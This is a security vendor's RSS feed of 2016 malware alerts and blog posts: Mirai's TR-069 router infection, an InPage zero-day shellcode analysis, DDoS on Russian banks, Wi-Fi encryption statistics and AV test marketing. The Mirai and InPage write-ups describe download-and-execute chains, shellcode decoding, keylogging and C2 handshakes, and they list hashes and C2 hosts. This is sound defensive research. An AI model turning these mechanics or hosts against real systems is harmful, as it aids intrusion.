Malware RSS Feed

New wave of Mirai attacking home routers

Malware Alerts - Mon, 11/28/2016 - 13:24

Background

Starting from yesterday, many DSL customers in Germany were reporting problems with their routers, which weren’t able to connect to their ISP anymore or that the internet connection was very weak. Today we saw news, that a malicious attack could be the reason for this widespread problem.

Fortunately we got some more technical details from users reporting the specific behaviour. With this information, were able to get hands on some samples and were able to reconstruct some details. Let’s have a quick look:

Exploiting the remote management protocol

As mentioned, users were seeing suspicious network activity. They saw this request incoming on TCP port 7547:

This request is part of the TR-069 specification, that defines an application layer protocol for remote management of end-user devices. This particular request is defined in the TR-098 data model for TR-069.

A vulnerability in affected routers causes the device to download the binary with file name “1” from http://l.ocalhost[.]host to the /tmp/-directory and executes it. The IP addresses of this host changed a few times during the day. Starting from 28th November 2016, 16:36 CET the domains cannot be resolved to domains anymore (“NXDOMAIN”).

Mirai related binary

During a quick analysis of the ELF 32-bit MIPS-MSB (big endian) variant used in todays attacks on German customers, we saw this Mirai-related sample perfoming this behaviour:

  • Delete itself from filesystem (resides only in memory)
  • Close vulnerable port using iptables: “iptables -A INPUT -p tcp –destination-port 7547 -DROP
  • Resolve command and control servers using DNS 8.8.8.8
    • timeserver[.]host
    • securityupdates[.]us
  • Scan the internet for open TCP 7547 and infect other devices using the same malicious request as seen above.

Since the malware is not able to write itself to the router’s persistent filesystem, the infection will not survive a reboot.

Our products detect the corresponding binaries as HEUR:Backdoor.Linux.Mirai.b

Update (2016-11-28 19:50 CET)

At the moment the C2 servers timeserver[.]host and securityupdates[.]us are both pointing to US military related IPs in the 6.0.0.0/8 range. Since there is no Mirai related infrastructure behind this network range, the bots will not receive any further commands until the criminals behind this attack will change the DNS records again.

IOCs Samples

ff47ff97021c27c058bbbdc9d327b9926e02e48145a4c6ea2abfdb036d992557
ff6e949c7d1cd82ffc4a1b27e488b84e07959472ed05755548efec90df82701e
ace9c1fe40f308a2871114da0d0d2f46965add1bda9c4bad62de5320b77e8a73

Hosts

timeserver[.]host
securityupdates[.]us
93.174.93[.]50
188.209.49[.]64
188.209.49[.]86
188.209.49[.]60
188.209.49[.]168
5.8.65[.]1
5.188.232[.]1
5.188.232[.]2
5.188.232[.]3
5.188.232[.]4
212.92.127[.]146
5.188.232[.]71

Malicious code and the Windows integrity mechanism

Malware Alerts - Mon, 11/28/2016 - 04:41

Introduction

Ask any expert who analyzes malicious code for Windows which system privileges malware works with and wants to acquire and, without a second thought, they’ll tell you: “Administrator rights”. Are there any studies to back this up? Unfortunately, I was unable to find any coherent analysis on the subject; however, it is never too late to play Captain Obvious and present the facts for public evaluation.

My goal wasn’t to review the techniques of elevating system privileges; the Internet already has plenty of articles on the subject. New mechanisms are discovered every year, and each technique deserves its own review. Here, I wanted to look at the overall picture and talk about the whole range of Windows operating systems in all their diversity dating back to Windows Vista, but without discussing specific versions.

Step Back in Time

The Windows XP security model differs significantly from the security model of Windows Vista and newer operating systems. There are two types of user accounts in Windows XP: a standard account and an administrator account. The vast majority of users worked with administrator rights, despite the fact that they didn’t need the rights for everyday tasks. These people infected their systems with malicious software that acquired the rights of the current user and, more often than not, they were administrator rights. As a result, the malicious software did not encounter any serious problems acquiring elevated privileges in a system running Windows XP.

This mechanism was used until the release of the Windows Vista family, where Microsoft introduced a new security model: Windows integrity mechanism.

Integrity Level in Windows 10

Roughly speaking, the two aforementioned user account types are present in the new mechanism; however, the operating system now utilizes the Admin Approval Mode. Yes, that very same, our “beloved” UAC (User Access Control). As soon as there is a need for elevated privileges, a UAC dialog pops up and prompts the user for permission to perform a certain action.

The human factor is one of the primary security problems, and that is why placing responsibility on a user who doesn’t know the first thing about computer security is, to say the least, a questionable decision. Microsoft itself has issued the following statement on the topic: “One important thing to know is that UAC is not a security boundary. UAC helps people be more secure, but it is not a cure all. UAC helps most by being the prompt before software is installed.” For those interested in Microsoft’s position on the matter, I recommend reading the following blog posts: User Account Control, User Account Control (UAC) – quick update, Update on UAC.

The Windows Integrity Mechanism

The new Windows integrity mechanism is the main protection component of the Windows security architecture. The mechanism restricts access permissions of applications that run under the same user account, but that are less trustworthy. Put more simply, this mechanism assigns an integrity level to processes as well as other securable objects in Windows. The integrity level restricts or grants access permissions of one object to another.

// // Mandatory Label Authority. // #define SECURITY_MANDATORY_LABEL_AUTHORITY {0,0,0,0,0,16} #define SECURITY_MANDATORY_UNTRUSTED_RID (0x00000000L) #define SECURITY_MANDATORY_LOW_RID (0x00001000L) #define SECURITY_MANDATORY_MEDIUM_RID (0x00002000L) #define SECURITY_MANDATORY_MEDIUM_PLUS_RID (SECURITY_MANDATORY_MEDIUM_RID + 0x100) #define SECURITY_MANDATORY_HIGH_RID (0x00003000L) #define SECURITY_MANDATORY_SYSTEM_RID (0x00004000L) #define SECURITY_MANDATORY_PROTECTED_PROCESS_RID (0x00005000L) // // SECURITY_MANDATORY_MAXIMUM_USER_RID is the highest RID that // can be set by a usermode caller. // #define SECURITY_MANDATORY_MAXIMUM_USER_RID SECURITY_MANDATORY_SYSTEM_RID

I won’t go into detail about the operation of the integrity mechanism. We only need one table to simplify interpretation of the gathered statistics: the table shows the connection between integrity levels and SID security identifiers (see Table 7) that identify the user, group, domain, or computer accounts in Windows.

SID in Access Token Assigned Integrity Level LocalSystem System LocalService System NetworkService System Administrators High Backup Operators High Network Configuration Operators High Cryptographic Operators High Authenticated Users Medium Everyone (World) Low Anonymous Untrusted

Most applications launched by a standard user are assigned a medium integrity level. Administrators get a high integrity level; services and the kernel receive system integrity. A low integrity level will be assigned to an App Container, for example. This is a typical level for modern browsers that protect the operating system from possible malware intrusions from malicious websites.

Basically, the high level and the levels above it are the ones that malicious software aims for.

Lies, Damned Lies, and Statistics

Contemporary anti-virus products implement a comprehensive approach to system security. That’s why they use dozens of components that prevent malicious code from infecting the system at various stages. Those components may include Web antivirus, script emulators, cloud signatures, exploit detectors, and much more. Data entering the system goes through numerous scans initiated by the different components of an antivirus product. As a result, a huge number of malicious programs do not get to the execution stage and are detected “on takeoff”. As for me, I was interested in malware that did manage to get to the execution stage. A contemporary antivirus product continues to track the potentially malicious object, in that even in the event of its execution, behavioral stream signatures (BSS) of the Kaspersky System Watcher component can be triggered.

So, I asked our Behavior Detection group to assist me in collecting statistics for system privilege levels used for execution by active malware, and which can be detected with the help of BSS.

Within 15 days, I managed to gather data on approximately 1.5 million detections with the help of Kaspersky Security Network. The entire range of Windows operating systems, starting with Windows Vista up to Windows 10, was included in the statistics. After filtering out some events and leaving only unique ones as well as those that do not contain our test signatures, I ended up with 976,000 detections. Let us take a look at the distribution of integrity levels for active malicious software during that period.

Distribution of Integrity Levels

By summing up Untrusted, Low, Medium, as well as High and System, it is possible to calculate a percentage ratio, which I called “OK to Bad”. Although, I assume, the creators of malware would not view this ratio as being so bad.

“OK to Bad” Ratio

Conclusions

What’s the reason for these horrifying statistics? To be honest, I can’t say for certain just yet; a deeper study is required. Sure enough, virus writers employ different methods to elevate privileges: autoelevation and bypassing the UAC mechanism, vulnerabilities in Windows and third-party software, social engineering, etc. There is a non-zero probability that many users have UAC completely disabled, as it irritates them. However, it is obvious that malware creators encounter no problems with acquiring elevated privileges in Windows; therefore, threat protection developers need to consider this problem.

Caribbean scuba diving with IT-security in mind

Malware Alerts - Thu, 11/24/2016 - 10:05

Dare to submit your research proposal before December 1, 2016 to dive into undiscovered and uncharted cybercrimes, hacks, espionage and much more at the Security Analyst Summit – April 2-6, 2017 on the Caribbean island of St. Maarten.

There are four months left before Kaspersky Lab’s Security Analyst Summit on the Caribbean Island of St Maarten, an invitation-only conference. If you still haven’t submitted your individual proposal, you’d better hurry up. There’s only one week left before the SAS17 program committee will start evaluating the abstracts. The summit will welcome those with new studies and tools, vulnerability reports, creative ideas, concepts or their results; insights into nation state cyber-espionage and government surveillance; research into attacks against financial institutions and critical infrastructure; mobile systems the IoT cyber risk landscape observations.

You’ll join the leading voices in the IT security industry – the chosen few – for knowledge and information sharing: senior executives from business organizations, global law enforcement agencies and CERTs, independent researchers and journalists. Previous events were joined by members of leading global companies, such as Samsung, Adobe, Microsoft, BlackBerry, CISCO, Boeing, Interpol, the World Bank, Team Cymru, The ShadowServer Foundation, ICSA Labs and Fidelis Cybersecurity Solutions. And every year SAS proves that IT security has no borders.

Requirements for submissions:

  1. Individual proposals should be no more than 350 words in length. SAS has a ground rule: nobody gets to speak from the stage for more than 30 minutes — this is the longest duration allowed for a keynote presentation — while everyone else gets 20 minutes maximum.
  2. Proposals should include the title of the paper and should clearly spell out the focus and goal of the presentation.
  3. The deadline for submissions is December 1, 2016.

You can send your abstract directly to sasCFP@kaspersky.com. The Program committee consists of six independent members, who evaluate the papers separately. They are Kaspersky Lab and external experts who share the SAS core value: uncompromising research. Have you been good this year? Santa The program committee will check soon.

Submit your abstract, find SPF20+ sunscreen, join the SAS family, follow @KasperskySAS and see how much fun it is — SAS2014, SAS2015 and SAS2016!

Research on unsecured Wi-Fi networks across the world

Malware Alerts - Thu, 11/24/2016 - 05:26

The very nature of wireless Wi-Fi networks means that hackers or criminals simply need to be located near an access point in order to eavesdrop and intercept network traffic. Poorly configured access point encryption or services that allow data to be sent without any encryption pose a serious threat to user data.

Confidential data can be protected by encrypting traffic at wireless access points. In fact, this method of protection is now considered essential for all Wi-Fi networks. But what actually happens in practice? Is traffic always encrypted on public Wi-Fi networks? How does the situation differ from country to country? Kaspersky Security Network statistics can answer all these questions. We compared the situation with Wi-Fi traffic encryption in different countries using data from our threat database. We counted the number of reliable and unreliable networks in each country that has more than 10 thousand access points known to us (this obviously excludes Antarctica and other regions where there is not enough data to draw any conclusions).

Security of Wireless Networks

Using statistics from Kaspersky Security Network (KSN), we analyzed data from across the world for almost 32 million Wi-Fi hotspots accessed by the wireless adapters of KSN users.

Encryption type used in public Wi-Fi hotspots across the world

Approximately 24.7% of Wi-Fi hotspots in the world do not use any encryption at all. This basically means that by using an antenna capable of sending and receiving data at 2.4 GHz, any individual located near an access point can easily intercept and store all user traffic and then browse it for data they are interested in. Fortunately, modern online banking systems and messengers do not transfer unencrypted data. But this is the only thing that prevents users of Wi-Fi networks with unencrypted traffic from revealing their passwords and other essential data when using an unsecure access point.

The WEP (Wired Equivalent Privacy) protocol for encryption of data transferred over Wi-Fi is used by approximately 3.1% of all analyzed access points. The protocol was the first to be created, quite a long time ago, and is now completely unreliable – it would take hackers just a few minutes to crack it. From a data security point of view, using WEP is not much different from using open networks. This protocol is being relegated to oblivion everywhere, but as we see from the chart above, it can still be found in use.

Around three-quarters of all access points use encryption based on the Wi-Fi Protected Access (WPA) protocol family. The protocols from this family are currently the most secure. The effort required to hack WPA depends on its settings, including the complexity of the password set by the hotspot owner. It is worth noting that an attempt to decipher traffic from “personal” (WPA-Personal, PSK authentication) wireless networks (with public access points) can be made by intercepting the handshakes between the access point and the device at the beginning of the session. “Corporate” versions are protected from this sort of interception because they use internal company authorization. When it comes to “personal” WPA2 attacks, the situation is similar to that of WPA and mostly depends on the strength of the password set by the hotspot owner.

It is only fair to note that during a standard attack on a Wi-Fi access point, a personal computer can generate from 50 to 300 keys per second on average. If the encryption key is strong, it will take years to hack it. Still, no one can guarantee that the key used at a cafe will be secure and that the attacker will have nothing but a PC at their disposal.

Overall, it can be said that today’s WPA/WPA2 “non-enterprise” versions are reasonably, but not absolutely, secure. In particular, they allow brute-force and dictionary attacks. There are ready-to-use publicly available tools (aircrack-ng and similar software) for performing such attacks, as well as a large number of manuals.

Geography of Unsecured Wi-Fi Access Points

Share of Wi-Fi hotspots that use unreliable WEP or do not encrypt data (by country)

We would like to note that the five countries with the highest proportion of unsecured connections include Korea (47.9% of unsecured Wi-Fi access points), while France (40.14%) and the US (39.31%) rate 9th and 12th respectively in the list.

Germany appears to be the most secure among Western European countries, with 84.91% of access points secured by WPA/WPA2 protocol encryption.

Share of Wi-Fi hotspots that use WPA/WPA2 (by country)

However, even when using an encrypted connection, you should not completely rely upon this security measure. There are several scenarios that could compromise even well-encrypted network traffic. These include fake access points with names that duplicate or mimic real ones (for example, TrainStation_Free or TrainStation Free) and compromised routers forwarding traffic without encryption to attackers (malware tools that infect such devices are already “in the wild”). At any rate, taking care of your own security is a good idea.

Recommendations for Users

There are several simple rules that help protect personal data when using open Wi-Fi networks in cafes, hotels, airports, and other public places.

  • Do not trust networks that are not password-protected.
  • Even if a network requests a password, you should remain vigilant. Fraudsters can find out the network password at a coffee shop, for example, and then create a fake connection with the same password. This allows them to easily steal personal user data. You should only trust network names and passwords given to you by employees of the establishment.
  • To maximize your protection, turn off your Wi-Fi connection whenever you are not using it. This will also save your battery life. We recommend disabling automatic connection to existing Wi-Fi networks too.
  • If you are not 100% sure the wireless network you are using is secure, but you still need to connect to the internet, try to limit yourself to basic user actions such as searching for information. You should refrain from entering your login details for social networks or mail services, and definitely not perform any online banking operations or enter your bank card details anywhere.
  • To avoid being a target for cybercriminals, you should enable the “Always use a secure connection” (HTTPS) option in your device settings. It is recommended to enable this option when visiting any websites you think may lack the necessary protection.
  • If possible, connect via a Virtual Private Network (VPN). With a VPN, encrypted traffic is transmitted over a protected tunnel, meaning criminals won’t be able to read your data, even if they gain access to them.
  • And, of course, you should use dedicated security solutions. They inform users about any potential dangers when connecting to a suspicious Wi-Fi network and prevent any passwords or other confidential data from being compromised if there is a threat.

One example of a dedicated solution is the Secure Connection tool included in the latest versions of Kaspersky Internet Security and Kaspersky Total Security. This module protects users connected to Wi-Fi networks by providing a secure encrypted connection channel. Secure Connection can be launched manually or, depending on the settings, activated automatically when connecting to public Wi-Fi networks, when navigating to online banking and payment systems or online stores, and when communicating online (mail services, social networks, etc.).

DDoS attack on the Russian banks: what the traffic data showed

Malware Alerts - Thu, 11/24/2016 - 03:57

From November 8 to 12, websites of some of the largest Russian banks fell victim to heavy DDoS attacks. Initially, it was no indication of anything unusual – all well-known banks get attacked from time to time – but further developments have evolved in the manner that allowed us to suggest a high level of organization in regards to the series of attacks.

The first attacks that took place on November 8 affected two banks, but already at 4:00 pm Moscow time, similar attacks struck three more banks. A little later, a fourth bank was attacked.

On November 9 at 3 am, the attacks stopped for a while only to commence again in the evening with an attack on yet another bank. At approximately 5 am on November 10, a new wave of attacks occurred.

The largest number of attacks took place between 5 and 8 am on November 11 when, within the space of 10 minutes, eleven attacks occurred, which targeted various objects, namely, corporate websites of banks and online banking systems. All attacks lasted approximately one hour and were similar to the attacks registered in the previous days.

In the days to follow, no new attacks occurred, but some of the previously launched attacks continued until the morning of November 14.

Kaspersky Lab received first-hand information as events unfolded: some of the banks that were attacked are our customers, and they promptly switched their traffic to Kaspersky DDoS Prevention centers with a few more joining after events had started. This provided the analysts of Kaspersky Lab access to the patterns of the attacks and gave them an opportunity to draw a number of conclusions about their nature.

  • Attackers used combinations of various attack methods. They applied SYN Flood that exhausts operating system resources, as well as HTTP/HTTPS Flood that overloads the target Web server.
  • The longest attack in the series lasted 4 days 6 hours and 34 minutes;
  • The peak power of the attack was 660 thousand requests per second, while the average load on a corporate website of a major bank during business hours rarely exceeds 1 thousand requests per second;
  • A few botnets “specializing” in different types of attacks participated in the attack. Approximately 24 thousand unique bots have been blocked;
  • The traffic analysis showed that the leads pointing to Mirai, which prematurely appeared in the press, were not substantiated: one of the botnets was indeed built on the basis of IoT devices, but a different bot was used.
  • Bots that participated in the attacks are located in 30 different countries. More than half of them are in the United States, India, Taiwan and Israel.

The most powerful attacks started when it was early morning in Moscow, which seems illogical at first glance – the number of visitors to the target websites of banks is low at this time of day. This can be attributed to feeling out the target: the attackers started loading the websites with relatively simple SYN Flood and HTTP Flood attacks, thereby determining the possibilities of the protection systems to filter packets of trash traffic. The small number of legitimate visitors enabled them to quite accurately determine the frequency of requests necessary to create a denial of service situation.

Attacks against the banks protected by Kaspersky DDoS Prevention were not successful. Having recognized this, the attackers began to act in accordance with a more complex and demanding procedure – via HTTPS requests, and in some cases transferring the focus of the attacks onto Internet banking systems. Since the traffic of an HTTPS session is encrypted, it is impossible to analyze and filter it when located outside of the affected network. Thanks to the ability to analyze the traffic at the customer site (for this purpose, a separate “sensor” component is used), we received the statistical parameters of requests that were used to generate the filtering parameters directly in the cloud. In addition, the results of the analysis were forwarded to the IT services of the banks, which, if necessary, successfully generated counteraction measures on their side.

The carefully thought-out tactics, use of combined methodologies and scale of the event suggest a high level of organization among the attackers – the “job” was done by professionals. In regards to one of the banks, after all attacks were successfully dealt with, an elaborate attack method against the application level that took advantage of the web server vulnerability was used. This also points to the attackers being highly qualified.

It is difficult to say what the aims of the series of attacks were: it may have been blackmail, diverting attention from a hacking attack against banking systems, or political hacktivism. However, the fact that the attackers targeted the banks’ corporate websites first, and only then switched to remote maintenance systems if they were unsuccessful, allows us to conclude that the organizers were more interested in publicity rather than doing real damage to the financial institutions.

To a certain extent, our findings correlate with the reports that appeared in the press referring to the attacks being ordered from a certain DDoS service. According to its owner, the persons who ordered the attacks were unhappy with the influence that Russia allegedly had on the US Presidential election and the websites of major Russian banks were selected as high-profile targets whose operational difficulties would definitely be noticed.

InPage zero-day exploit used to attack financial institutions in Asia

Malware Alerts - Wed, 11/23/2016 - 03:59

In September 2016, while researching a new wave of attacks, we found an interesting target which appeared to constantly receive spearphishes, a practice we commonly describe as a “magnet of threats”. Among all the attacks received by this magnet of threats, which included various older Office exploits such as CVE-2012-0158, one of them attracted our attention. This file, which was also uploaded to a multiscanner service in September 2016, had an extension that we were unfamiliar with – “.inp”. Further investigation revealed this was an InPage document. InPage, in case you are wondering, is publishing and text processing software, mostly popular with Urdu and Arabic speaking users.

InPage user groups from vendor official site

Since no exploits for InPage have previously been mentioned in public, we took a closer look to see if the document was malicious or not. Further analysis indicated the file contained shellcode, which appeared to decrypt itself and further decrypt an EXE file embedded in the document. The shellcode appeared to trigger on several versions of InPage. We don’t observe any public mentions of such exploit so we consider it a zero-day. All our attempts to contact InPage so far have failed.

Discovery and analysis

InPage is an interesting vulnerable software selection as it’s widely used within the Indian Muslim population, as well as in Pakistan. This, of course, includes local mass-media and print shops, governmental and financial institutions (banks). If someone wants to deploy attack modules into regional press-related companies, an InPage exploit would work well.

Due to its wide range of technologies, it wasn’t perhaps surprising to see that Kaspersky Lab products already detect the exploit with the generic rule HEUR:Exploit.Win32.Generic. This detection is triggered by the presence of the shellcode inside a Microsoft Compound Storage file (OLE), which works extremely well for a wide category of Office-based exploits, going back to 2009.

The good news is that Kaspersky Lab users have been protected against this attack for quite some time – and the protection worked well in the past when it blocked a number of malicious InPage documents.

Between the various phishing campaigns relying on this exploit, one particular attack attracted our attention. The targets of this attack were special, since they were banks in Asia and Africa. The payload and C&C servers are also different from the recent attacks we’ve observed, meaning there are probably several actors utilizing this zero-day exploit at the moment.

Technical details

Spearphishing e-mail with several malicious attachments. The .inp contains the zero-day exploit

In their attacks, the threat actors often use more than one malicious document. During spearphishing, the actors attached InPage files as well as .rtfs and .docs with old popular exploits.

Looking through all the related documents we could find, we counted several different versions of keyloggers and backdoors written mostly in Visual C++, Delphi and Visual Basic.

One such keylogger we analysed (MD5 hash: 18a5194a4254cefe8644d191cb96da21) was written in Visual C++. After gaining control, the module decodes several internal strings. One of them is the C2 domain name visitorzilla[.]com. This backdoor maintains persistence by creating “C:\Documents and Settings\<USER>\Start Menu\Programs\Startup\DataABackup.lnk“. Similar to the other campaign modules, it uses SetWindowsHook() with WH_KEYBOARD_LL hook to gather keystrokes. To gather keystroke data, the module uses two files on disk: C:\Documents and Settings\<USER>\Application Data\DataBackup\sed.ic and me.ic (located in the same directory).

Inside weaponized documents

InPage uses its own proprietary file format that is based on the Microsoft Compound File Format. The parser in the software’s main module “inpage.exe” contains a vulnerability when parsing certain fields. By carefully setting such a field in the document, an attacker can control the instruction flow and achieve code execution.

The shellcode has three main parts:

  1. Pattern searcher (so-called “egg hunter”) before the decoder,
  2. Decoder.
  3. Downloader.

The pattern searcher looks through all of the virtual memory space attempting to find the pattern “68726872”. Once the searcher identifies this pattern it starts the next stage of exploit – the decoder.

Shellcode decryptor

The small decoder obtains the instruction pointer and uses FLDPI + FSTENV instructions (an old and uncommon technique). The decoder is using an arithmetic NOT followed by a XOR 0xAC operation to decrypt the next stage.

Next, the downloader fetches a remote payload using InternetReadFile() and runs it using the WinExec() function in the %userprofile% directory. This functionality is very common and we’ve seen it with many other exploits. It’s the choice of vulnerable software that is interesting in this case and, for sure, the appearance of an exploit for software that is popular mostly in India and Pakistan.

The final payload is a Trojan written in Visual Basic 6. It defines a hook using the SetWindowsHook() function with the WH_MSGFILTER parameter. It communicates with its C2 server at 195.189.227.26 on port 8080.

During the initial session the C2 server sends “Pass” and host replies with “Auth<username>@<hostname>\#/<OS version>\#/<IP address>\#/-” In addition to b4invite[.]com this same Trojan was also spread using a configuration with the C2 server relaybg[.]com.

Victims

So far, victims of these attacks have been observed in Myanmar, Sri-Lanka and Uganda. The sector for the victims include both financial and governmental institutions.

Conclusions

By all appearances, this newly discovered exploit has been in the wild for several years. In some way, it reminds us of other similar exploits for Hangul Word Processor, another language/region-specific text processing suite used almost exclusively in South Korea. HWP has been plagued by several exploits in the past, which have been used by various threat groups to attack Korean interests.

Despite our attempts, we haven’t been able to get in touch with the InPage developers. By comparison, the Hangul developers have been consistently patching vulnerabilities and publishing new variants that fix these problems. The best defense against exploits is always a multi-layered approach to security. Make sure you have an internet security suite capable of catching exploits generically, such as Kaspersky Internet Security. Installing the Microsoft EMET tool can also help, as well as running the most recent version of Windows (10). Finally, default deny policies, also known as whitelisting can mitigate many such attacks.

The Australian Signals Directorate Top35 list of mitigation strategies shows us that at least 85% of intrusions could have been mitigated by following the top four mitigation strategies together. These are: application whitelisting, updating applications, updating operating systems and restricting administrative privileges. Kaspersky Lab has technological solutions to cover the first three of these (i.e. all the technology-based strategies) as well as most of the others from Top35 ASD’s list.

Kaspersky Lab detects this exploit as HEUR:Exploit.Win32.Generic.

More information about this exploit, associated campaigns and attacks is available to customers of Kaspersky Intelligence Services. Contact: intelreports@kaspersky.com

Indicators of compromise: Hashes

f00e20ec50545106dc012b5f077954ae – rtf
729194d71ed65dd1fe9462c212c32159 – inp
c9e7ec899142477146d4f7f83df3f63f
750ed4f79496dee1d624a7b508f83f4e
B43aa5ea4ff5292fd92d416bb2b41c3a
4d508e44c5f3028a36a5206383cf235c
53c3503d3193bf14a93dc3ac24829490
5a9a8502b87ce1a6a608debd1076195

C&Cs used in the samples dropped by the weaponized InPage documents:

Relaybg[.]com
B4invite[.]com
Leastinfo[.]com
tropicmig[.]com
Digivx[.]com
Gigatrons[.]com
kinohata[.]ru
Visitorzilla[.]com
Ambicluster[.]com
Aliasway[.]com <- SINKHOLED by Kaspersky Lab
Xynoder[.]com
By4mode[.]com
Stringbit[.]com
Encrypzi.com
Gigsense[.]com
I3mode[.]com

Lost in Translation, or the Peculiarities of Cybersecurity Tests

Malware Alerts - Mon, 11/21/2016 - 07:50

In the book The Hitchhiker’s Guide to the Galaxy there’s a character called the Babel fish, which is curiously able to translate into and from any language. Now, in the present-day world, the global cybersecurity industry speaks one language – English; however, sometimes you really do wish there was such a thing as a Babel fish to be able to help customers understand the true meaning of the marketing messages of certain vendors.

Here’s a fresh example.

Earlier this month the independent testing lab AV-Comparatives simultaneously conducted two tests of cybersecurity products using one and the same methodology. The only differences between the two tests were (i) in the line-ups of participating products in each; and (ii) in the names of the tests themselves: Comparative Test of Business Security Products and Comparison of ‘Next-Generation’ Security Products.

Strange? A little. So let me tell you what’s afoot here: why these practically identical tests were conducted at the same time.

It’s well-known already (to folks interested in IT security) how some cybersecurity vendors try to avoid open, public testing and comparisons with other products – so as not to expose their inadequacy. But by not taking part in such tests the marketing machinery of these vendors loses a crucial bit ton of leverage: all potential customers – mostly corporate ones – always consult independent tests run by dependable specialist organizations. So, what were they to do? A solution was found: to join up with other ‘next-gen’ developers to be tested together and separately (no ‘traditional AV’ allowed!), to hide behind a convenient methodology, and coat it all with the BS buzz term ‘next generation’.

Days after the testing the ‘next-gen’ participants published their own interpretations of the results based on dubious logical deduction, manipulation of figures, and biased marketing rhetoric. And you guessed it – those interpretations brought them all to the same conclusion, that ~ “here, finally, it’s been publicly proven how next-gen reigns supreme over traditional products”!

Really? Ok, time we turned on the Babel fish…

Is it really true that next-gen products are great? And if so great… – great compared to what? Let’s compare the results of the ‘next-gen’ test with the above-mentioned twin-test – i.e., the same test (using the exact same methodology), only with different (non ‘next-gen’) participating products.

Important: the true quality of protection should be judged by the figure outside the brackets that corresponds to protection rate, not detection rate, since there’s no point in just detecting attacks but still then letting them take place, i.e., not stopping them.

Protection from malware in different scenarios and false positives:

Protection against exploits:

Well, I can hear how the clanging of medals in the next-generation camp seems to have come to a sudden halt, while their ‘victorious’ self-published reports can now be seen for what they really are: mere attempts to intentionally deceive users ‘in the best traditions of misleading test marketing‘.

Judge for yourself:

One participant in its press release appears to have forgotten to tell anyone about its bombing on protection from exploits (28%), while also seeming to have switched its results on the protection rate in the WPDT scenario (100% instead of 98%).

Another participant also kept quiet about its modest result on protection from exploits (82%), but proudly called its… last-but-one place in the contest in this category as “…outperform[ing] other endpoint security competitors in exploit protection”. It also preferred not to mention its coming last in the AVC scenario test, but that didn’t stop it claiming that mythical ‘legacy AV’ (whatever that is) simply MUST be replaced by its products.

A third participant decided to get straight to the point by laying claim to the crown of the ‘most next-gen of all’, having received, nothing short of a blessing certification from this test lab to replace mythical ‘legacy AV’ with its next-gen products:

The Babel fish has a few other questions regarding this test.

The methodology used this time for testing protection against malicious programs was simpler than that used in the regular full-fledged Real World Protection Test by which other (non-‘next-gen’) products are normally certified. In the Real World Protection Test, each month for a year six times more real cyberattack scenarios (WPDT) are used. And even adding RTTL and AVC scenarios doesn’t make up for this simplification.

So why was simplification of the methodology and a division of the participants (into ‘next-gen’ and ‘business’) needed? Was it an indulgence to the next-gen vendors, which were afraid of flopping big-time on regular tests? How well would these developers do in a full-fledged test together with the technological leaders?

And the last question: what is ‘next generation’?

According to a comprehensive study by the SANS Institute conducted at the request of another self-proclaimed ‘next-gen’ vendor, the category ‘Next-generation AV’ covers all large vendors of cybersecurity solutions. Moreover, many ‘next-gen’ vendors do not qualify for the ‘Next-generation AV’ tag – especially when it comes to the level of effectiveness and protection from zero-day threats:

I can’t say that I fully agree with above mentioned definition: absent from it are such important things as multi-level protection, adaptability, and the ability to not only detect but also prevent, react to and predict cyberattacks, which are all much more important for the user. However, even this definition unequivocally states that all products need to be tested as per one and the same methodology.

Simplifying the WPDT-test and dividing the reports into ‘next-gen’ and ‘non-next-gen’ misleads customers, creates a basis for marketing maneuvering and manipulation, and even undermines the trust long invested in the independent labs running the tests.

 
Take-Aways:

First, (in spite of everything): I want to express my thanks to AV-Comparatives for finally being able to conduct a public test of several ‘next-gen’ products. Ok, so the methodology used was WPDT-lite, and the test results can’t be used to directly compare participants. Still, as they say, you can’t have everything straight away – or – the first step is always the most difficult/crucial: the main thing is that ‘next-gen’ has finally been publically tested by an authoritative independent lab, which is just what we’d been wanting for a long time.

Second: I hope that other independent test labs will follow AV-Comparatives’ example in testing ‘next-gen’ – preferably as per AMTSO standards – and, crucially, together with all vendors. And I hope the vendors in turn, won’t throw obstacles in the test labs’ way.

Third: When choosing a cybersecurity solution it’s necessary to take into account as many different tests as possible. Reliable products set themselves apart by constantly notching up stable top results in different tests by different independent labs over many years.

And finally: Now, in the nick of time for the planning of budgets for next year, I hope ‘next-gen’ developers will allocate more resources to the development of technologies and participation in public tests, rather than on fancy advertising billboards, planned inaccuracies in press-releases, and expensive parties stuffed with celebrities.

‘Next-gen’ security products manipulate public tests

Tweet

PS – from Babel fish:

“The word combination ‘next-generation security’ and its derivations in public communications – be they marketing material, advertising videos, white papers, or the arguments of a sales manager – can be a sign of aggressive telepathic matrixes directed at the promotion of pure BS, and thus necessitate a particularly astringent practical application of critical reason.”

From the author:

“I understood none of that, but fully agree with the fish – whatever it was it was babbling on about.”

Kids and Education

SANS Tip of the Day - Mon, 11/21/2016 - 00:00
One of the most effective methods you can use to protect kids online is to talk to them. The younger you start talking to them, and they to you, the better. Hold regular conversations about online safety issues, even going so far as to show them actual negative events that have taken place. If you don't know what your kids are doing, simply ask. Play the clueless parent and ask them to show you what the latest technologies are and how they use them. Quite often, kids love the idea of being the teacher and will open up.

Kaspersky Security Bulletin. Predictions for 2017

Malware Alerts - Wed, 11/16/2016 - 03:57

 Download the PDF

Yet another year has flown past and, as far as notable infosec happenings are concerned, this is one for the history books. Drama, intrigue and exploits have plagued 2016 and, as we take stock of some of the more noteworthy stories, we once again cast our gaze forward to glean the shapes of the 2017 threat landscape. Rather than thinly-veiled vendor pitching, we hope to ground these predictions in trends we’ve observed in the course of our research and provide thought-provoking observations for researchers and visitors to the threat intelligence space alike.

Our record

Last year’s predictions fared well, with some coming to fruition ahead of schedule. In case you didn’t commit these to memory, some of the more notable predictions included:

APTs: We anticipated a decreased emphasis on persistence as well as an increased propensity to hide in plain sight by employing commodity malware in targeted attacks. We’ve seen this, both with an increase in memory or fileless malware as well as through the myriad reported targeted attacks on activists and companies, which relied on off-the-shelf malware like NJRat and Alienspy/Adwind.

Ransomware: 2016 can be declared the year of ransomware. Financial malware aimed at victimizing users has practically been galvanized into a ransomware-only space, with the more effective extortion scheme cannibalizing malware development resources from less profitable attempts at victimizing users.

Forecast for 2017: time to start using Yara rules more extensively as IoCs become less effective

Tweet

More Bank Heists: When we considered the looming expansion of financial crime at the highest level, our hypothetical included targeting institutions like the stock exchange. But it was the attacks on the SWIFT network that brought these predictions to bear, with millions walking out the door thanks to crafty, well-placed malware.

Internet Attacks: Most recently, the oft-ignored world of sub-standard Internet-connected devices finally came to bear on our lives in the form of a nasty IoT botnet that caused outages for major Internet services, and hiccups for those relying on a specific DNS provider.

